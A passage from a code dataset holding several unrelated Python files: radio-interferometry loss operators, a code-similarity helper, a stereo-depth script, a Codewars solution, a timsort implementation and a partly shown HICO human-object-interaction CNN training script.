scipy.sparse.linalg.LinearOperator object.\n The forward call is equivalent to xarray.utils_observe.block_observe_same_nonoise().\n\n Parameters\n ----------\n obs: ehtim.Observation,\n ehtim Observation object.\n movie_coords: xr.Coordinates,\n The coordinates of the movie\n dtype: np.dtype, default=np.complex128,\n Datatype\n \"\"\"\n def __init__(self, obs, movie_coords, dtype=_np.complex128):\n\n if isinstance(movie_coords, _xr.core.coordinates.DataArrayCoordinates):\n movie_coords = movie_coords.to_dataset()\n movie_coords = movie_coords.utils_image.change_units('rad')\n movie_coords['t'].utils_movie.check_time_units(obs.timetype)\n\n import ehtim.observing.obs_helpers as _obsh\n\n # Forward coordinates\n obslist = obs.tlist()\n u_list = [obsdata['u'] for obsdata in obslist]\n v_list = [obsdata['v'] for obsdata in obslist]\n t_list = [obsdata[0]['time'] for obsdata in obslist]\n u, v = _np.concatenate(u_list), _np.concatenate(v_list)\n self._obstimes = t_list\n uv_per_t = _np.array([len(obsdata['v']) for obsdata in obslist])\n self._uvsplit = _np.cumsum(uv_per_t)[:-1]\n\n # Adjoint coordinates\n self._movie_coords = movie_coords.coords\n\n # Define forward operator as a sequence (list) of matrix operations\n A = []\n self._nx = movie_coords['x'].size\n self._ny = movie_coords['y'].size\n self._nt = movie_coords['t'].size\n psize = movie_coords.utils_image.psize\n for ui, vi in zip(u_list, v_list):\n A.append(_obsh.ftmatrix(psize, self._nx, self._ny, _np.vstack((ui, vi)).T))\n self._A = A\n\n # Weights for adjoint interpolation\n weights = _np.zeros((self._nt, len(t_list)))\n for i, t in enumerate(t_list):\n idx = _np.argmin(_np.abs(t - movie_coords['t'].data))\n point0 = movie_coords['t'].data[idx]\n if _np.allclose(t, point0):\n weights[idx, i] = 1.0\n else:\n pm = int(_np.sign(t - point0))\n if ((idx + pm >= movie_coords['t'].size) or (idx + pm < 0)):\n raise AttributeError('Observation time is out of bounds for movie duration')\n point1 = movie_coords['t'].data[idx + pm]\n interval = _np.abs(point0 - point1)\n assert (interval > 0), 'Interval should be g.t. 0'\n weights[idx, i] = 1.0 - _np.abs(point0 - t) / interval\n weights[idx + pm, i] = 1.0 - _np.abs(point1 - t) / interval\n\n self._weights = weights\n\n # Shape and datatype\n self.shape = (u.size, self._nt * self._ny * self._nx)\n self.dtype = dtype\n\n def _matvec(self, x):\n x = x.reshape(self._nt, self._nx, self._ny) if x.ndim != 3 else x\n if (not len(self._movie_coords['t']) == len(self._obstimes)) or not \\\n _np.allclose(self._movie_coords['t'], self._obstimes):\n x = _xr.DataArray(x, coords=self._movie_coords, dims=['t', 'y', 'x']).interp(\n t=self._obstimes, assume_sorted=True).values\n output = _np.concatenate([_np.matmul(At, xt.ravel()) for At, xt in zip(self._A, x)])\n return output\n\n def _rmatvec(self, x):\n x_list = _np.split(x, self._uvsplit)\n eht_H = _np.stack([_np.matmul(At.conj().T, xt) for At, xt in zip(self._A, x_list)])\n return _np.matmul(self._weights, eht_H).ravel()\n\nclass Loss(object):\n \"\"\"\n A Loss container which aggregates data-fit and regularization Operators.\n This container is meant to be used together with scipy.optimize.minimize(fun=loss, jac=loss.jac).\n\n Parameters\n ----------\n data_ops: pynoisy.operators.LossOperator or list of pynoisy.operators.LossOperator,\n Data-fit operators which implement: `__call__(self, x)` and `gradient(self, x)`.\n reg_ops: pynoisy.operators.LossOperator or list of pynoisy.operators.LossOperator, optional.\n Regularization operators which implement: `__call__(self, x)` and `gradient(self, x)`.\n \"\"\"\n def __init__(self, data_ops, reg_ops=None):\n self.data_ops = _np.atleast_1d(data_ops)\n self.reg_ops = _np.atleast_1d(reg_ops)\n\n def __call__(self, x):\n loss = _np.sum([data_op.w * data_op(x) for data_op in self.data_ops])\n for reg_op in self.reg_ops:\n if (reg_op is not None):\n loss += reg_op.w * reg_op(x)\n return loss\n\n def jac(self, x):\n grad = _np.sum([data_op.w * data_op.gradient(x) for data_op in self.data_ops], axis=0)\n for reg_op in self.reg_ops:\n if (reg_op is not None):\n grad += reg_op.w * reg_op.gradient(x)\n return grad.real.astype(_np.float64)\n\nclass LossOperator(object):\n \"\"\"\n A LossOperator container which is inherited by the specific loss implementation.\n LossOperators should implement the methods: `__call__(self, x)` and `gradient(self, x)`.\n\n Parameters\n ----------\n weight: float, default=1.0,\n The weight of the operator in the total loss\n \"\"\"\n def __init__(self, weight=1.0):\n self.w = weight\n\n def __call__(self, x):\n pass\n\n def gradient(self, x):\n pass\n\nclass L2LossOp(LossOperator):\n \"\"\"\n An l2 LossOperator implementing the computation and gradient of ||measurements - forwardOp(x)||^2\n\n Parameters\n ----------\n measurements: np.array,\n A 1D numpy array with measurement values.\n forwardOp: LinearOperator,\n A LinearOperator which implements: `_matvec(self, x)` and `_rmatvec(self, x)` (see [1])\n weight: float, default=1.0,\n The weight of the operator in the total loss\n \"\"\"\n def __init__(self, measurements, forwardOp, sigmas=None, weight=1.0):\n super().__init__(weight=weight)\n self.measurements = _np.array(measurements).ravel()\n self.sigmas = _np.ones_like(self.measurements) if sigmas is None else sigmas\n self.forwardOp = forwardOp\n\n def __call__(self, x):\n return _np.sum((_np.abs(self.measurements - self.forwardOp * x) / self.sigmas) ** 2)\n\n def gradient(self, x):\n return 2 * self.forwardOp.H * ( (self.forwardOp * x - self.measurements) / self.sigmas**2)\n\nclass L2RegOp(LossOperator):\n \"\"\"\n An l2 regularization LossOperator implementing the computation and gradient of ||x||^2\n\n Parameters\n ----------\n weight: float, default=1.0,\n The weight of the operator in the total loss\n \"\"\"\n def __call__(self, x):\n return _np.sum(_np.abs(x) ** 2)\n\n def gradient(self, x):\n return 2 * x\n\nclass MEMRegOp(LossOperator):\n \"\"\"\n Maximum Entropy Method regularization LossOperator.\n Entropy(x; prior) = sum( x * log( x/(prior + eps) ) )\n\n Parameters\n ----------\n prior: np.array,\n A 1D numpy array which represents the (raveled) prior vector.\n eps: float, default=1e-5,\n A regularization parameter to avoid division by zero.\n weight: float, default=1.0,\n The weight of the operator in the total loss\n \"\"\"\n def __init__(self, prior, eps=1e-5, weight=1.0):\n super().__init__(weight=weight)\n self.eps = eps\n self.prior = _np.array(prior).ravel()\n\n def __call__(self, x):\n return _np.sum(x * _np.log((x + self.eps) / (self.prior + self.eps)))\n\n def gradient(self, x):\n return _np.log((x + self.eps) / (self.prior + self.eps)) + 1\n\nclass FluxRegOp(LossOperator):\n \"\"\"\n Total flux regularization LossOperator.\n\n Parameters\n ----------\n prior: float,\n The prior on the total flux.\n weight: float, default=1.0,\n The weight of the operator in the total loss\n \"\"\"\n def __init__(self, prior, weight=1.0):\n super().__init__(weight=weight)\n self.prior = prior\n\n def __call__(self, x):\n return (_np.sum(x) - self.prior) ** 2\n\n def gradient(self, x):\n return 2 * (_np.sum(x) - self.prior) * _np.ones(len(x), dtype=_np.float64)\n\nclass STVRegOp(LossOperator):\n \"\"\"\n Squared Total Variation regularization LossOperator:\n STV[I(y,x)] = || \\nabla_x I(y,x)||**2 + || \\nabla_y I(y,x)||**2\n\n Parameters\n ----------\n ny, nx: int,\n Number of (y/x)-axis grid points.\n weight: float, default=1.0,\n The weight of the operator in the total loss\n\n Notes\n -----\n Requires PyLops library: https://pylops.readthedocs.io/\n \"\"\"\n def __init__(self, ny, nx, edge=False, kind='forward', weight=1.0):\n super().__init__(weight=weight)\n\n from pylops import FirstDerivative\n self.dyOp = FirstDerivative(nx*ny, dims=(ny, nx), dir=0, edge=edge, kind=kind)\n self.dxOp = FirstDerivative(nx*ny, dims=(ny, nx), dir=1, edge=edge, kind=kind)\n self.ny = ny\n self.nx = nx\n\n def __call__(self, x):\n return _np.sum((self.dxOp*x)**2 + (self.dyOp*x)**2)\n\n def gradient(self, x):\n \"\"\"\n Compute the gradient of the TV regularization:\n grad[STV(I)] = -2 * div( \\nabla(I) )\n\n Notes\n -----\n The adjoint of the gradient is minus the divergent.\n \"\"\"\n return 2.0 * (self.dxOp.H * self.dxOp * x + self.dyOp.H * self.dyOp * x)\n\nclass TVRegOp(LossOperator):\n \"\"\"\n Total Variation regularization LossOperator:\n TV[I(y,x)] = || \\nabla_x I(y,x)||_1 + || \\nabla_y I(y,x)||_1\n\n Parameters\n ----------\n ny, nx: int,\n Number of (y/x)-axis grid points.\n weight: float, default=1.0,\n The weight of the operator in the total loss\n\n Notes\n -----\n Requires PyLops library: https://pylops.readthedocs.io/\n \"\"\"\n def __init__(self, ny, nx, edge=False, kind='forward', eps=1e-8, weight=1.0):\n super().__init__(weight=weight)\n\n from pylops import FirstDerivative\n self.dyOp = FirstDerivative(nx*ny, dims=(ny, nx), dir=0, edge=edge, kind=kind)\n self.dxOp = FirstDerivative(nx*ny, dims=(ny, nx), dir=1, edge=edge, kind=kind)\n self.eps = eps\n self.ny = ny\n self.nx = nx\n\n def __call__(self, x):\n return _np.sum(_np.abs(self.dxOp*x) + _np.abs(self.dyOp*x))\n\n def gradient(self, x):\n \"\"\"\n Compute the (epsilon regularized) gradient of the TV regularization:\n grad[TV(I)] = -div( \\nabla(I) / sqrt( eps**2 + \\nabla(I)**2 ) )\n\n Notes\n -----\n The adjoint of the gradient is minus the divergent.\n\n References\n ----------\n https://mathematical-tours.github.io/book-sources/chapters-pdf/variational-priors.pdf\n \"\"\"\n gradx, grady = self.dxOp*x, self.dyOp*x\n gradient = self.dxOp.H * ( gradx / _np.sqrt(self.eps**2 + _np.abs(gradx)**2)) + \\\n self.dyOp.H * ( grady / _np.sqrt(self.eps**2 + _np.abs(grady)**2))\n return gradient\n\n def _softthreshold(x, thresh):\n \"\"\"Soft thresholding.\n Applies soft thresholding to vector ``x`` (equal to the proximity operator for\n :math:`||\\mathbf{x}||_1`) as shown in [1].\n\n Parameters\n ----------\n x : :obj:`numpy.ndarray`\n Vector\n thresh : :obj:`float`\n Threshold\n\n Returns\n -------\n x1 : :obj:`numpy.ndarray`\n Tresholded vector\n\n Refrences\n ---------\n https://github.com/PyLops/pylops/blob/82b0f7dbc25ccdddc9bdab204d2f769d2ff4114f/pylops/optimization/sparsity.py#L53\n\n .. [1] Chen, Y., Chen, K., Shi, P., Wang, Y., “Irregular seismic\n data reconstruction using a percentile-half-thresholding algorithm”,\n Journal of Geophysics and Engineering, vol. 11. 2014.\n \"\"\"\n if _np.iscomplexobj(x):\n # https://stats.stackexchange.com/questions/357339/soft-thresholding-\n # for-the-lasso-with-complex-valued-data\n x1 = _np.maximum(_np.abs(x) - thresh, 0.) * _np.exp(1j * _np.angle(x))\n else:\n x1 = _np.maximum(_np.abs(x) - thresh, 0.) * _np.sign(x)\n return x1\n","repo_name":"aviadlevis/pynoisy","sub_path":"pynoisy/operators.py","file_name":"operators.py","file_ext":"py","file_size_in_byte":17182,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"40"} +{"seq_id":"74224802999","text":"import pycode_similar\nfrom pprint import pprint\n\ndef similarity_check(ref_code: str, actual_code: str):\n print(ref_code)\n print(actual_code)\n\n _, info = pycode_similar.detect([ref_code, actual_code],\n diff_method=pycode_similar.UnifiedDiff,\n keep_prints=False,\n module_level=False)[0]\n return info[0].plagiarism_percent\n\n# if __name__ == \"__main__\":\n# sample_code = \"\"\"class Solution:\n# def maxDepth(self, root: TreeNode) -> int:\n\n# if not root:\n# return 0\n\n# l = self.maxDepth(root.left)\n# r = self.maxDepth(root.right)\n\n# if l > r:\n# return l + 1\n# return r + 1\n# \"\"\"\n# sol_1_code = \"\"\"class Solution:\n# def maxDepth(self, root: TreeNode) -> int:\n# if not root:\n# return 0\n \n# depth = 0\n# q = []\n# q.append(root)\n \n# while q:\n# depth += 1\n# temp = []\n \n# for node in q:\n# if node.left:\n# temp.append(node.left)\n# if node.right:\n# temp.append(node.right)\n \n# q = temp\n \n# return depth\n# \"\"\"\n# pprint(similarity_check(sample_code, sol_1_code))","repo_name":"hidevscommunity/gen-ai-apps","sub_path":"PyEx/similarity_check.py","file_name":"similarity_check.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"1463073023","text":"#################################################################\n###\n### Program to compute depth from stereo camera\n### Uses open cv\n###\n#################################################################\n\n\nimport numpy as np\nimport cv2\nfrom matplotlib import pyplot as plt\nimport time\n\n\ncap1 = cv2.VideoCapture(0);\ncap2 = cv2.VideoCapture(1);\n# imgL = cv2.imread('images/l_94_3.png', cv2.IMREAD_GRAYSCALE)\n# imgR = cv2.imread('images/r_94_3.png', cv2.IMREAD_GRAYSCALE)\n\nfig=plt.figure()\nplt.ion()\nplt.show(block=False)\nwhile True:\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n ret, imgL = cap1.read()\n ret, imgR = cap2.read()\n\n # imgL = cv2.resize(imgL, (0,0), fx=0.8, fy=0.8)\n # imgR = cv2.resize(imgR, (0,0), fx=0.8, fy=0.8)\n\n imgL = cv2.cvtColor(imgL, cv2.COLOR_BGR2GRAY)\n imgR = cv2.cvtColor(imgR, cv2.COLOR_BGR2GRAY)\n\n ret,imgL = cv2.threshold(imgL, 127, 255, cv2.THRESH_BINARY+cv2.THRESH_OTSU)\n ret,imgR = cv2.threshold(imgR, 127, 255, cv2.THRESH_BINARY+cv2.THRESH_OTSU)\n\n\n window_size = 3\n min_disp = 16\n num_disp = 112-min_disp\n\n stereo = cv2.StereoSGBM(minDisparity = min_disp,\n numDisparities = num_disp,\n SADWindowSize = window_size,\n uniquenessRatio = 10,\n speckleWindowSize = 100,\n speckleRange = 32,\n disp12MaxDiff = 1,\n P1 = 8*3*window_size**2,\n P2 = 32*3*window_size**2,\n fullDP = False\n )\n\n # stereo = cv2.StereoSGBM(0, 32, 3, 128, 256, 20, 16, 1, 100, 20, True)\n disparity = stereo.compute(imgL,imgR)\n\n # plt.figure()\n plt.subplot(221), plt.imshow(imgL, 'gray')\n plt.subplot(222), plt.imshow(imgR, 'gray')\n plt.subplot(223), plt.imshow(disparity)\n plt.draw()\n\n\ncap2.release()\ncap1.release()\ncv2.destroyAllWindows()\n","repo_name":"hashir-n-a/mobware4u-python","sub_path":"ROBOT_DEPTH.py","file_name":"ROBOT_DEPTH.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8274707318","text":"\"\"\"\r\nTitle: Pete, the baker\r\nSource: https://www.codewars.com/kata/525c65e51bf619685c000059/python\r\nPete likes to bake some cakes. He has some recipes and ingredients. Unfortunately he is not good in maths. Can you help\r\n him to find out, how many cakes he could bake considering his recipes?\r\nWrite a function cakes(), which takes the recipe (object) and the available ingredients (also an object) and returns\r\n the maximum number of cakes Pete can bake (integer). For simplicity there are no units for the amounts\r\n (e.g. 1 lb of flour or 200 g of sugar are simply 1 or 200). Ingredients that are not present in the objects,\r\n can be considered as 0.\r\nExamples:\r\n# must return 2\r\ncakes({flour: 500, sugar: 200, eggs: 1}, {flour: 1200, sugar: 1200, eggs: 5, milk: 200})\r\n# must return 0\r\ncakes({apples: 3, flour: 300, sugar: 150, milk: 100, oil: 100}, {sugar: 500, flour: 2000, milk: 2000})\r\n\"\"\"\r\n\r\n\r\ndef cakes(recipe, available):\r\n\r\n listaDivInteira = []\r\n disponivel = {}\r\n\r\n if len(recipe) > len(available): \r\n return 0\r\n\r\n for k in recipe.keys(): \r\n if k not in available:\r\n return 0\r\n\r\n for k, v in available.items(): \r\n if k in recipe:\r\n disponivel[k] = v\r\n\r\n for k in disponivel.keys():\r\n listaDivInteira.append(disponivel[k] // recipe[k])\r\n return min(listaDivInteira)\r\n\r\n\r\n#MAIN\r\nprint(cakes({'sugar': 67, 'apples': 38, 'nuts': 32}, {'cream': 6080, 'chocolate': 9862, 'apples': 8870, 'crumbles': 6407, 'butter': 4885, 'milk': 2759, 'cocoa': 3718, 'pears': 2170, 'eggs': 4371, 'flour': 8459}))\r\n","repo_name":"SamMarckson/Python-Practice","sub_path":"Pete, the baker.py","file_name":"Pete, the baker.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35407887282","text":"\"\"\"Sort algorithm adapted from https://github.com/btrevizan/ordernsearch.git.\"\"\"\n\n\ndef def_key(x):\n \"\"\"Return the element to compare with.\n\n Keyword arguments:\n x -- object of any kind\n \"\"\"\n return x\n\n\ndef timsort(sequence, key=def_key):\n \"\"\"Tim sort implementation.\n\n Keyword arguments:\n sequence -- a 1darray to order\n key -- function that retrive a singular element\n (default is the element itself)\n \"\"\"\n n = len(sequence) # number of elements\n r = 16 # length of runs\n\n # For each run, sort with insertion\n for i in range(0, n, r):\n # Sort with insertion\n sequence[i:i + r] = insertion(sequence[i:i + r], key)\n\n # For each run, pairwise merge\n while r < n:\n for i in range(0, n - r, r * 2):\n left = i # left head's index\n right = i + r # right head's index\n\n # Divide sequences\n sequence1 = sequence[left:right]\n sequence2 = sequence[right:right + r]\n\n # Merge sequences\n sequence[left:right + r] = __simplemerge(sequence1, sequence2, key)\n\n r = r * 2\n\n return sequence\n\n\ndef insertion(sequence, key=def_key):\n \"\"\"Insertion sort with sequencial search.\n\n Keyword arguments:\n sequence -- a 1darray to order\n key -- function that retrive a singular element\n (default is the element itself)\n \"\"\"\n n = len(sequence) # number of elements\n\n # For each element...\n for i in range(1, n):\n value = sequence[i]\n\n # For each element already sorted...\n j = i - 1 # index of prev element\n while j >= 0:\n\n # Compare elements\n changed = key(value) < key(sequence[j])\n if not changed:\n break\n\n # Move the element forward by 1\n sequence[j + 1] = sequence[j]\n\n # Update j\n j = j - 1\n\n # Insert element after sequence[j]\n sequence[j + 1] = value\n\n return sequence\n\n\ndef __simplemerge(sequence1, sequence2, key=def_key):\n \"\"\"Merge two sequences. The result is a sorted list.\n\n Keyword arguments:\n sequence1 -- sequence to be merge to the other\n sequence2 -- other\n key -- function that retrive a singular element\n (default is the element itself)\n \"\"\"\n\n n1 = len(sequence1) # sequence's 1 length\n n2 = len(sequence2) # sequence's 2 length\n l = 0 # left's index\n r = 0 # right's index\n\n # List with merged elements (sorted too)\n merge = list()\n\n # For each element on both sequences...\n for i in range(n1 + n2):\n\n left = sequence1[l] # left element\n right = sequence2[r] # right element\n\n # Compare elements\n if key(left) < key(right):\n merge.append(left)\n l += 1\n else:\n merge.append(right)\n r += 1\n\n # End of left segment, concat right segment\n if l == len(sequence1):\n for j in range(r, len(sequence2)):\n merge.append(sequence2[j])\n\n break\n\n # End of right segment, concat left segment\n if r == len(sequence2):\n for j in range(l, len(sequence1)):\n merge.append(sequence1[j])\n\n break\n\n # Update i\n i += 1\n\n return merge\n","repo_name":"btrevizan/poa_expenses","sub_path":"src/pysort.py","file_name":"pysort.py","file_ext":"py","file_size_in_byte":3398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4119480372","text":"# Imports\nfrom __future__ import print_function\n\nimport os\nimport time\n\nimport dgl\nimport networkx as nx\nimport torch\nimport torchvision\nfrom torch import nn, optim\nfrom torch.utils.data import DataLoader\nfrom tensorboardX import SummaryWriter\nfrom sklearn.model_selection import train_test_split\n\nimport ipdb\nimport h5py\nimport pickle\nimport argparse\nimport numpy as np\nfrom PIL import Image, ImageDraw, ImageFont\nimport random\nimport datetime\n\nimport utils.io as io\nfrom model.cnn_model import HOCNN\nfrom datasets import metadata\nfrom utils.vis_tool import vis_img\nfrom datasets.hico_constants import HicoConstants\nfrom datasets.hico_dataset import HicoDataset, collate_fn\n\nfrom optimizers import adabound\n\nimport json\nimport cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n#%matplotlib inline\n\n# Set random seed for reproducibility\ntorch.manual_seed(21)\nnp.random.seed(21)\n\n# Define data paths\nTRAIN_IMG_PATH = \"datasets/hico/images/train2015/\"\n\n# Setup training device\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nprint('training on {}'.format(device))\n\n# Define arguments\nbatch_size = 32\nepochs = 300\ninitial_lr = 0.0005\nfinal_lr = 0.1 # Only for adabound optimizer\nl2_weight_decay = 0.00005\nweighted_loss_alpha = 1 # Boost the weight of positives to help negative dominance\nweighted_loss_beta = 0.9999 # From the class based balance formula\n\nfeat_type = 'fc7'\ndata_aug = False\nexp_ver = 'v2_nl2_' + datetime.datetime.now().strftime(\"%Y-%m-%d_%H-%M\")\n# w = weighted loss, n = normalized (/255), l2 = l2 norm\n# 0 = adagrad, 1 = adabound\nsave_dir = './checkpoints/hico'\nlog_dir = './log/hico'\nsave_every = 5\nprint_batch_every = 100\nprint_epoch_every = 1\n\n# set the cache size [0 means infinite]\nmax_img_cache_size = 1 #40000\n\nprint('Running experiment ' + exp_ver)\n\n# Define dataloaders\ndata_const = HicoConstants(feat_type=feat_type)\n\ntrain_dataset = HicoDataset(data_const=data_const, subset='train', data_aug=data_aug)\nval_dataset = HicoDataset(data_const=data_const, subset='val', data_aug=False, test=True)\ndataset = {'train': train_dataset, 'val': val_dataset}\nprint('Set up dataset variable successfully')\n\ntrain_dataloader = DataLoader(dataset=dataset['train'], batch_size=batch_size, shuffle=True, collate_fn=collate_fn, drop_last=True)\nval_dataloader = DataLoader(dataset=dataset['val'], batch_size=batch_size, shuffle=True, collate_fn=collate_fn, drop_last=True)\ndataloader = {'train': train_dataloader, 'val': val_dataloader}\nprint('Set up dataloader successfully')\n\n# Define model\nmodel = HOCNN().to(device)\n\n# Display parameter information\nparameter_num = 0\nfor param in model.parameters():\n parameter_num += param.numel()\nprint(f'The number of parameters in this model is {parameter_num / 1e6} million')\n\n# Define weighted loss due to unbalanced dataset\n# Implemented class balanced loss from [https://github.com/richardaecn/class-balanced-loss]\n# The average of these weights is 1.0\n'''\nwith open('datasets/processed/hico/hoi_cls_count.json') as f:\n hoi_class_count = json.load(f)\n hoi_classes = hoi_class_count.keys()\n samples_per_class = np.zeros((len(hoi_classes), ))\n for hoi_class in hoi_classes:\n samples_per_class[int(hoi_class) - 1] = hoi_class_count[hoi_class]\n effective_num = 1.0 - np.power(weighted_loss_beta, samples_per_class)\n loss_weights = (1.0 - weighted_loss_beta) / np.array(effective_num)\n loss_weights = weighted_loss_alpha * loss_weights / np.sum(loss_weights) * len(hoi_classes)\n loss_weights = torch.tensor(loss_weights).float().to(device)\n'''\n\n# Todo: look at distribution balanced loss from [https://github.com/wutong16/DistributionBalancedLoss]\n \n# Weighted loss using difference between class sizes\n# Each class pos_weight is num_greatest_class / num_pos\n# It seems like the graients explode even using only the num_greatest\n'''\nwith open('datasets/processed/hico/hoi_cls_count.json') as f:\n hoi_class_count = json.load(f)\n hoi_classes = hoi_class_count.keys()\n samples_per_class = np.zeros((len(hoi_classes), ))\n greatest_sample = 0\n for hoi_class in hoi_classes:\n greatest_sample = max(greatest_sample, hoi_class_count[hoi_class])\n samples_per_class[int(hoi_class) - 1] = hoi_class_count[hoi_class]\n loss_weights = greatest_sample / samples_per_class\n loss_weights = torch.tensor(loss_weights).float().to(device)\n \nprint('Calculated loss weights')\n'''\n\n# Define loss function\ncriterion = nn.BCEWithLogitsLoss()\n#criterion = nn.BCEWithLogitsLoss(reduction='none')\n#criterion = nn.BCEWithLogitsLoss(pos_weight=loss_weights)\n#criterion = nn.CrossEntropyLoss()\n\n# Define optimizer\noptimizer = optim.Adam(model.parameters(), lr=initial_lr, weight_decay=l2_weight_decay)\n#optimizer = adabound.AdaBound(model.parameters(), lr=initial_lr, final_lr=final_lr, weight_decay=l2_weight_decay)\n#optimizer = optim.SGD(model.parameters(), lr=initial_lr, momentum=0.9, weight_decay=0)\n\n# Setup visualization\nwriter = SummaryWriter(log_dir=log_dir + '/' + exp_ver + '/' + 'epoch_train')\nio.mkdir_if_not_exists(os.path.join(save_dir, exp_ver, 'epoch_train'), recursive=True)\n\n# Training loop\nwith open('datasets/processed/hico/anno_list.json') as f:\n anno_list = json.load(f)\n \nimg_cache = {} # format {key: [human, object, pairwise]}\nimg_cache_counter = 0\n \nprint('Training has started!')\n \nfor epoch in range(epochs):\n epoch_loss = 0\n epoch_accuracy = 0\n for phase in ['train', 'val']:\n start_time = time.time()\n running_loss = 0.0\n running_correct = 0\n idx = 0\n \n for data in dataloader[phase]:\n train_data = data\n img_name = train_data['img_name']\n \n labels = np.zeros((batch_size, 600))\n batch_correct = 0\n for i in range(batch_size):\n # Get image data\n parsed_img_name = img_name[i].split(\".\")[0]\n img = [x for x in anno_list if x['global_id'] == parsed_img_name][0]\n img_data = img['hois'][0]\n pos_hois = list(map(int, img['pos_hoi_ids']))\n for pos_hoi in pos_hois:\n labels[i][pos_hoi - 1] = 1\n human_bboxes = img_data['human_bboxes']\n object_bboxes = img_data['object_bboxes']\n\n # Apply masks to images [with caching]\n src_img_path = TRAIN_IMG_PATH + parsed_img_name + '.jpg'\n if src_img_path in img_cache: # Use cache if available\n human_bbox_img, obj_bbox_img, pairwise_bbox_img = img_cache[src_img_path]\n else:\n src = cv2.imread(src_img_path)\n human_mask = np.zeros_like(src)\n for bbox in human_bboxes:\n cv2.rectangle(human_mask, (bbox[0], bbox[1]), (bbox[2], bbox[3]), (255, 255, 255), thickness=-1)\n human_bbox_img = cv2.bitwise_and(src, human_mask, mask=None)\n\n obj_mask = np.zeros_like(src)\n pairwise_mask = human_mask\n for bbox in object_bboxes:\n cv2.rectangle(obj_mask, (bbox[0], bbox[1]), (bbox[2], bbox[3]), (255, 255, 255), thickness=-1)\n cv2.rectangle(pairwise_mask, (bbox[0], bbox[1]), (bbox[2], bbox[3]), (255, 255, 255), thickness=-1)\n obj_bbox_img = cv2.bitwise_and(src, obj_mask, mask=None)\n pairwise_bbox_img = cv2.bitwise_and(src, pairwise_mask, mask=None)\n \n # Add to cache if within limits\n if not max_img_cache_size or img_cache_counter < max_img_cache_size:\n img_cache[src_img_path] = [human_bbox_img, obj_bbox_img, pairwise_bbox_img]\n img_cache_counter += 1\n\n '''\n # Visualization of masks NOTE: Not guarenteed to work outside of jupyter notebook\n f, axarr = plt.subplots(1,3)\n\n human_bbox_rgb = cv2.cvtColor(human_bbox_img, cv2.COLOR_BGR2RGB)\n axarr[0].imshow(human_bbox_rgb)\n\n object_mask_rgb = cv2.cvtColor(obj_bbox_img, cv2.COLOR_BGR2RGB)\n axarr[1].imshow(object_mask_rgb)\n\n pairwise_rgb = cv2.cvtColor(pairwise_bbox_img, cv2.COLOR_BGR2RGB)\n axarr[2].imshow(pairwise_rgb)\n\n plt.show()\n f.clf()\n '''\n\n human_bbox_img = cv2.resize(human_bbox_img, (64, 64), interpolation=cv2.INTER_AREA)\n obj_bbox_img = cv2.resize(obj_bbox_img, (64, 64), interpolation=cv2.INTER_AREA)\n pairwise_bbox_img = cv2.resize(pairwise_bbox_img, (64, 64), interpolation=cv2.INTER_AREA)\n \n # Normalize images by dividing by 255\n human_bbox_img = human_bbox_img/255\n obj_bbox_img = obj_bbox_img/255\n pairwise_bbox_img = pairwise_bbox_img/255\n\n human_bbox_img = torch.from_numpy(human_bbox_img).to(device)\n obj_bbox_img = torch.from_numpy(obj_bbox_img).to(device)\n pairwise_bbox_img = torch.from_numpy(pairwise_bbox_img).to(device)\n\n if i == 0:\n res_human_input = human_bbox_img.unsqueeze(0)\n res_obj_input = obj_bbox_img.unsqueeze(0)\n res_pairwise_input = pairwise_bbox_img.unsqueeze(0)\n else:\n res_human_input = torch.cat((res_human_input, human_bbox_img.unsqueeze(0)), dim=0)\n res_obj_input = torch.cat((res_obj_input, obj_bbox_img.unsqueeze(0)), dim=0)\n res_pairwise_input = torch.cat((res_pairwise_input, pairwise_bbox_img.unsqueeze(0)), dim=0)\n\n res_human_input = res_human_input.permute([0,3,1,2]).float().to(device)\n res_obj_input = res_obj_input.permute([0,3,1,2]).float().to(device)\n res_pairwise_input = res_pairwise_input.permute([0,3,1,2]).float().to(device)\n labels = torch.from_numpy(labels).float().to(device)\n \n if phase == 'train':\n # Initial train loop\n model.train()\n model.zero_grad()\n \n # Forward pass: human, objects, pairwise streams\n outputs = model.forward(res_human_input, res_obj_input, res_pairwise_input)\n loss = criterion(outputs, labels)\n #loss = (loss * loss_weights).mean()\n loss.backward()\n optimizer.step()\n \n preds = torch.argmax(outputs, dim=1)\n for accuracy_iterator in range(len(preds)):\n ground_labels = torch.nonzero(labels[accuracy_iterator]).squeeze()\n if preds[accuracy_iterator] in ground_labels:\n batch_correct += 1\n \n else:\n # Evaluation after train loop\n model.eval()\n with torch.no_grad(): # Disable gradients for validation\n outputs = model.forward(res_human_input, res_obj_input, res_pairwise_input)\n loss = criterion(outputs, labels)\n #loss = (loss * loss_weights).mean()\n \n preds = torch.argmax(outputs, dim=1)\n for accuracy_iterator in range(len(preds)):\n ground_labels = torch.nonzero(labels[accuracy_iterator]).squeeze()\n if preds[accuracy_iterator] in ground_labels:\n batch_correct += 1\n \n # Accumulate loss of each batch (average * batch size)\n running_loss += loss.item() * batch_size\n running_correct += batch_correct\n \n # Print out status per print_batch_every\n idx += 1\n if (idx % print_batch_every) == 0:\n print(\"[{}] Epoch: {}/{} Batch: {}/{} Loss: {} Accuracy: {}\".format(\\\n phase, epoch+1, epochs, idx, len(dataloader[phase]), \\\n loss.item(), 100 * batch_correct / batch_size))\n \n # Epoch loss and accuracy\n epoch_loss = running_loss / len(dataset[phase])\n epoch_accuracy = 100 * running_correct / len(dataset[phase])\n \n # Log trainval data for visualization\n if phase == 'train':\n train_loss = epoch_loss \n train_accuracy = epoch_accuracy\n else:\n writer.add_scalars('trainval_loss_epoch', {'train': train_loss, 'val': epoch_loss}, epoch)\n writer.add_scalars('trainval_accuracy_epoch', {'train': train_accuracy, 'val': epoch_accuracy}, epoch)\n \n # Output data per print_epoch_every\n if (epoch % print_epoch_every) == 0:\n end_time = time.time()\n print(\"[{}] 